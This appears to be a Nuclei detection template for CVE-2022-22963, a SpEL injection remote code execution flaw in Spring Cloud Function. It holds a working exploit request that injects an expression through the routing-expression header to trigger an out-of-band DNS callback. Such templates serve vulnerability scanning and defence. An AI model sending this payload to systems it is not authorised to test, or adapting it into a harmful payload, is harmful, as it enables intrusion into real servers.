id: CVE-2022-22963
info:
name: Spring Cloud Function SPEL RCE
author: Mr-xn,Adam Crosser
severity: critical
reference:
- https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f
- https://github.com/cckuailong/spring-cloud-function-SpEL-RCE
- https://tanzu.vmware.com/security/cve-2022-22963
- https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/
- https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection
classification:
cve-id: CVE-2022-22963
tags: cve,cve2022,springcloud,rce
requests:
- raw:
- |
POST /functionRouter HTTP/1.1
Host: {{Hostname}}
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("{{interactsh-url}}")
Content-Type: application/x-www-form-urlencoded
{{rand_base(8)}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- "dns"
condition: or
- type: status
status:
- 500